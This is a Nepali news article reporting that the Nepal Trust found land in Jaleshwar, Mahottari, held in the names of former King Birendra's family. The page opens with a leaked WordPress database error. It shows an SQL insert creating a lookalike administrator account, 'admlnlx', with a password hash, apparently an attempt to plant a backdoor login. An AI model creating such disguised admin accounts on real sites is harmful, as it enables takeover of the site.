WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjZmNo9hPG5qIbeiy4Jg9Pd8.wd37C0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:05:02', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ १३-
पूर्वराजा वीरेन्द्र शाहको परिवारको १० कट्ठा जग्गा फेला परेको छ । पूर्वराजा वीरेन्द्र र उनका परिवारजनको नाममा रहेको सम्पत्ति हेर्ने नेपाल ट्रस्टले खोजबिन गर्दा महोत्तरीको जलेश्वरमा उक्त जग्गा फेला पारेको हो ।
ट्रस्टका सहसचिव लेखबहादुर कार्कीले पूर्वराजपरिवारको नाममा रहेको उक्त जग्गा कात्तिकमा फेला पारिएको भए पनि ट्रस्टको सञ्चालक समितिको बैठक बस्न नसक्दा ट्रस्टको नाममा ल्याउन नसकिएको बताउनुभयो । उहाँले भन्नुभयो, “चाँडै नै सञ्चालक समितिको बैठक बसेर मन्त्रिपरिषद्मा पठाउँछौँ । मन्त्रिपरिषद्ले पारित गरेपछि उक्त जग्गा ट्रस्टको नाममा आउँछ ।” उहाँले अरू स्थानमा रहेको जग्गाको पनि खोजी भइरहेको जानकारी दिनुभयो ।
ट्रस्टले पूर्वराजा र उनका परिवारजनको नाममा रहेको जग्गामध्ये हालसम्म २३ हजार रोपनी फेला पारिसकेको छ ।